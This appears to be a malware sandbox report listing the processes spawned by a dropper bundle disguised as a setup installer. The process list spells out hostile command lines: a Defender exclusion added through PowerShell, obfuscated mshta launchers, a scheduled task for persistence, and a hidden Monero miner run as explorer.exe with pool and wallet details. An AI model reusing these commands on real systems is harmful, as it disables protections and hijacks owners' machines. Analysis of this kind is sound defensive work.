PID 3552 wrote to memory of 3312 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3552 wrote to memory of 3312 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3552 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3552 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3552 wrote to memory of 4004 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3552 wrote to memory of 2268 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3552 wrote to memory of 2268 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3552 wrote to memory of 2268 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3552 wrote to memory of 3976 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3552 wrote to memory of 3976 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3552 wrote to memory of 3976 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3552 wrote to memory of 4240 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3552 wrote to memory of 4240 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3552 wrote to memory of 4240 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3312 wrote to memory of 3404 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat19e4750dd01.exe
PID 3312 wrote to memory of 3404 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat19e4750dd01.exe
PID 3312 wrote to memory of 3404 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat19e4750dd01.exe
PID 4392 wrote to memory of 3896 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat191649b47c9e2.exe
PID 4392 wrote to memory of 3896 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat191649b47c9e2.exe
PID 4428 wrote to memory of 4708 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat1946eb84e6.exe
PID 4428 wrote to memory of 4708 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat1946eb84e6.exe
PID 4428 wrote to memory of 4708 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat1946eb84e6.exe
PID 4004 wrote to memory of 4072 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat19f84b58b3d7.exe
PID 4004 wrote to memory of 4072 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat19f84b58b3d7.exe
PID 4540 wrote to memory of 2008 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4540 wrote to memory of 2008 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4540 wrote to memory of 2008 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 3224 wrote to memory of 4716 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat196ac06a9e6.exe
PID 3224 wrote to memory of 4716 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat196ac06a9e6.exe
PID 3224 wrote to memory of 4716 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat196ac06a9e6.exe
PID 3976 wrote to memory of 4788 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat19e6a852f849bb2.exe
PID 3976 wrote to memory of 4788 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat19e6a852f849bb2.exe
PID 3976 wrote to memory of 4788 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat19e6a852f849bb2.exe
PID 4388 wrote to memory of 4776 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat199ba8a4637dcb034.exe
PID 4388 wrote to memory of 4776 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat199ba8a4637dcb034.exe
PID 2268 wrote to memory of 4768 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat19ba05e89ea6d406.exe
PID 2268 wrote to memory of 4768 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat19ba05e89ea6d406.exe
PID 2268 wrote to memory of 4768 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat19ba05e89ea6d406.exe
PID 4240 wrote to memory of 4856 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat19c6762a08beae.exe
PID 4240 wrote to memory of 4856 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat19c6762a08beae.exe
PID 4240 wrote to memory of 4856 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat19c6762a08beae.exe
PID 4768 wrote to memory of 956 N/A C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat19ba05e89ea6d406.exe C:\Users\Admin\AppData\Local\Temp\is-620S8.tmp\Sat19ba05e89ea6d406.tmp

Processes

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s gpsvc

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s WpnService

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s Browser

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s SENS

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s UserManager

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s Themes

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s Schedule

C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe

"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat191649b47c9e2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat1946eb84e6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat199ba8a4637dcb034.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat19e4750dd01.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat19e6a852f849bb2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat19c6762a08beae.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat19e4750dd01.exe

Sat19e4750dd01.exe /mixone

C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat196ac06a9e6.exe

Sat196ac06a9e6.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat19c6762a08beae.exe

Sat19c6762a08beae.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat199ba8a4637dcb034.exe

Sat199ba8a4637dcb034.exe

C:\Users\Admin\AppData\Local\Temp\is-620S8.tmp\Sat19ba05e89ea6d406.tmp

"C:\Users\Admin\AppData\Local\Temp\is-620S8.tmp\Sat19ba05e89ea6d406.tmp" /SL5="$6006A,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat19ba05e89ea6d406.exe"

C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat19ba05e89ea6d406.exe

Sat19ba05e89ea6d406.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat19e6a852f849bb2.exe

Sat19e6a852f849bb2.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat19f84b58b3d7.exe

Sat19f84b58b3d7.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat1946eb84e6.exe

Sat1946eb84e6.exe

C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat191649b47c9e2.exe

Sat191649b47c9e2.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat19ba05e89ea6d406.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat19f84b58b3d7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Sat196ac06a9e6.exe

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Users\Admin\AppData\Local\Temp\is-QR3HM.tmp\46807GHF____.exe

"C:\Users\Admin\AppData\Local\Temp\is-QR3HM.tmp\46807GHF____.exe" /S /UID=burnerch2

C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe

"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"

C:\ProgramData\8016308.exe

"C:\ProgramData\8016308.exe"

C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe

"C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser1100.exe"

C:\ProgramData\4638748.exe

"C:\ProgramData\4638748.exe"

C:\Users\Admin\AppData\Local\Temp\2.exe

"C:\Users\Admin\AppData\Local\Temp\2.exe"

C:\ProgramData\330255.exe

"C:\ProgramData\330255.exe"

C:\Users\Admin\AppData\Local\Temp\setup_2.exe

"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"

C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe

"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"

C:\Users\Admin\AppData\Local\Temp\jhuuee.exe

"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"

C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe

"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"

C:\Users\Admin\AppData\Local\Temp\is-EB0NR.tmp\setup_2.tmp

"C:\Users\Admin\AppData\Local\Temp\is-EB0NR.tmp\setup_2.tmp" /SL5="$8014A,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"

C:\Users\Admin\AppData\Local\Temp\3002.exe

"C:\Users\Admin\AppData\Local\Temp\3002.exe"

C:\Users\Admin\AppData\Local\Temp\udptest.exe

"C:\Users\Admin\AppData\Local\Temp\udptest.exe"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3404 -s 656

C:\ProgramData\3067764.exe

"C:\ProgramData\3067764.exe"

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Users\Admin\AppData\Local\Temp\3002.exe

"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a

C:\Users\Admin\AppData\Local\Temp\is-G6I8S.tmp\setup_2.tmp

"C:\Users\Admin\AppData\Local\Temp\is-G6I8S.tmp\setup_2.tmp" /SL5="$30280,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4400 -s 952

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Users\Admin\AppData\Local\Temp\setup_2.exe

"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT

C:\ProgramData\1767048.exe

"C:\ProgramData\1767048.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\ProgramData\330255.exe

"C:\ProgramData\330255.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3404 -s 672

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBSCrIPt: close ( crEateobJeCt ("wsCRIpT.sHEll" ). RUN ( "C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\ProgramData\3067764.exe"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If """"== """" for %l In ( ""C:\ProgramData\3067764.exe"") do taskkill -Im ""%~nxl"" /F " , 0 , TRuE) )

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4316 -s 808

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k SystemNetworkService

C:\ProgramData\408949.exe

"C:\ProgramData\408949.exe"

C:\ProgramData\690570.exe

"C:\ProgramData\690570.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3404 -s 632

C:\ProgramData\7454952.exe

"C:\ProgramData\7454952.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4316 -s 840

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\ProgramData\3067764.exe" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If ""== "" for %l In ( "C:\ProgramData\3067764.exe") do taskkill -Im "%~nxl" /F

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3404 -s 664

C:\ProgramData\1350539.exe

"C:\ProgramData\1350539.exe"

C:\ProgramData\418909.exe

"C:\ProgramData\418909.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4316 -s 856

C:\ProgramData\7454952.exe

"C:\ProgramData\7454952.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBSCrIPt: close ( crEateobJeCt ("wsCRIpT.sHEll" ). RUN ( "C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\ProgramData\418909.exe"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If """"== """" for %l In ( ""C:\ProgramData\418909.exe"") do taskkill -Im ""%~nxl"" /F " , 0 , TRuE) )

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5692 -s 948

C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE

C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3404 -s 904

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4316 -s 900

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\ProgramData\418909.exe" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If ""== "" for %l In ( "C:\ProgramData\418909.exe") do taskkill -Im "%~nxl" /F

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill -Im "3067764.exe" /F

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBSCrIPt: close ( crEateobJeCt ("wsCRIpT.sHEll" ). RUN ( "C:\Windows\system32\cmd.exe /q /C cOPy /Y ""C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If ""-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 ""== """" for %l In ( ""C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE"") do taskkill -Im ""%~nxl"" /F " , 0 , TRuE) )

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4316 -s 992

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C cOPy /Y "C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE" C3KHKEn~m73GVLA.exE && StArT C3KHKEN~m73GVlA.exE -P48RT5mWbqdvVNE0ZvDVppXXBhLw9 & If "-P48RT5mWbqdvVNE0ZvDVppXXBhLw9 "== "" for %l In ( "C:\Users\Admin\AppData\Local\Temp\C3KHKEn~m73GVLA.exE") do taskkill -Im "%~nxl" /F

C:\Program Files\Windows Media Player\VLAYMQWNQW\ultramediaburner.exe

"C:\Program Files\Windows Media Player\VLAYMQWNQW\ultramediaburner.exe" /VERYSILENT

C:\Users\Admin\AppData\Local\Temp\is-C4PRC.tmp\ultramediaburner.tmp

"C:\Users\Admin\AppData\Local\Temp\is-C4PRC.tmp\ultramediaburner.tmp" /SL5="$203E4,281924,62464,C:\Program Files\Windows Media Player\VLAYMQWNQW\ultramediaburner.exe" /VERYSILENT

\??\c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s BITS

C:\Users\Admin\AppData\Local\Temp\97-4ed47-8c5-fcaa3-c4a113f7fd1ad\Nyxaemekovy.exe

"C:\Users\Admin\AppData\Local\Temp\97-4ed47-8c5-fcaa3-c4a113f7fd1ad\Nyxaemekovy.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4316 -s 1220

C:\Users\Admin\AppData\Local\Temp\b5-d300e-bc3-cf6a9-a11571ea2a86b\SHulogelishi.exe

"C:\Users\Admin\AppData\Local\Temp\b5-d300e-bc3-cf6a9-a11571ea2a86b\SHulogelishi.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3404 -s 940

C:\Windows\SysWOW64\taskkill.exe

taskkill -Im "418909.exe" /F

C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe

"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3404 -s 1108

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" .\zyYHQ.U,xGNjygcjY

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Users\Admin\AppData\Roaming\services64.exe

"C:\Users\Admin\AppData\Roaming\services64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4doxgwmn.iek\GcleanerEU.exe /eufive & exit

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4sr2mtx2.ujk\installer.exe /qn CAMPAIGN="654" & exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nb51r3m1.omc\anyname.exe & exit

C:\Users\Admin\AppData\Local\Temp\4doxgwmn.iek\GcleanerEU.exe

C:\Users\Admin\AppData\Local\Temp\4doxgwmn.iek\GcleanerEU.exe /eufive

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0vsjjct3.czj\gcleaner.exe /mixfive & exit

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\4sr2mtx2.ujk\installer.exe

C:\Users\Admin\AppData\Local\Temp\4sr2mtx2.ujk\installer.exe /qn CAMPAIGN="654"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im Sat19e6a852f849bb2.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\7zSCE0D4654\Sat19e6a852f849bb2.exe" & del C:\ProgramData\*.dll & exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xyhjcinl.0lp\autosubplayer.exe /S & exit

C:\Users\Admin\AppData\Local\Temp\nb51r3m1.omc\anyname.exe

C:\Users\Admin\AppData\Local\Temp\nb51r3m1.omc\anyname.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /im Sat19e6a852f849bb2.exe /f

C:\Users\Admin\AppData\Local\Temp\0vsjjct3.czj\gcleaner.exe

C:\Users\Admin\AppData\Local\Temp\0vsjjct3.czj\gcleaner.exe /mixfive

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 2D8C21E9EA5712200D3316CBE246C137 C

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca

C:\Windows\system32\browser_broker.exe

C:\Windows\system32\browser_broker.exe -Embedding

C:\Windows\system32\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global

C:\Windows\SysWOW64\timeout.exe

timeout /t 6

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\4sr2mtx2.ujk\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\4sr2mtx2.ujk\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631133655 /qn CAMPAIGN=""654"" " CAMPAIGN="654"

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 9E5D3D033FFBD477332A61132B443BAF

C:\Windows\SysWOW64\taskkill.exe

"C:\Windows\SysWOW64\taskkill.exe" /im AdvancedWindowsManager* /f

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe

"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 565A819C1867CCF916D3B45D9CC43A1C E Global\MSI0000

C:\Windows\explorer.exe

C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth

\??\c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s seclogon

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe

"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"

C:\Users\Admin\AppData\Local\Temp\EF0.exe

C:\Users\Admin\AppData\Local\Temp\EF0.exe

C:\Users\Admin\AppData\Local\Temp\246D.exe

C:\Users\Admin\AppData\Local\Temp\246D.exe

C:\Users\Admin\AppData\Local\Temp\4208.exe

C:\Users\Admin\AppData\Local\Temp\4208.exe

C:\Users\Admin\AppData\Local\Temp\4208.exe

C:\Users\Admin\AppData\Local\Temp\4208.exe

C:\Windows\SysWOW64\icacls.exe

icacls "C:\Users\Admin\AppData\Local\a4d8c519-f54f-4af3-a594-deab4073acdc" /deny *S-1-1-0:(OI)(CI)(DE,DC)

C:\Users\Admin\AppData\Local\Temp\6919.exe

C:\Users\Admin\AppData\Local\Temp\6919.exe

C:\Users\Admin\AppData\Local\Temp\4208.exe

"C:\Users\Admin\AppData\Local\Temp\4208.exe" --Admin IsNotAutoStart IsNotTask

C:\Users\Admin\AppData\Local\Temp\4208.exe

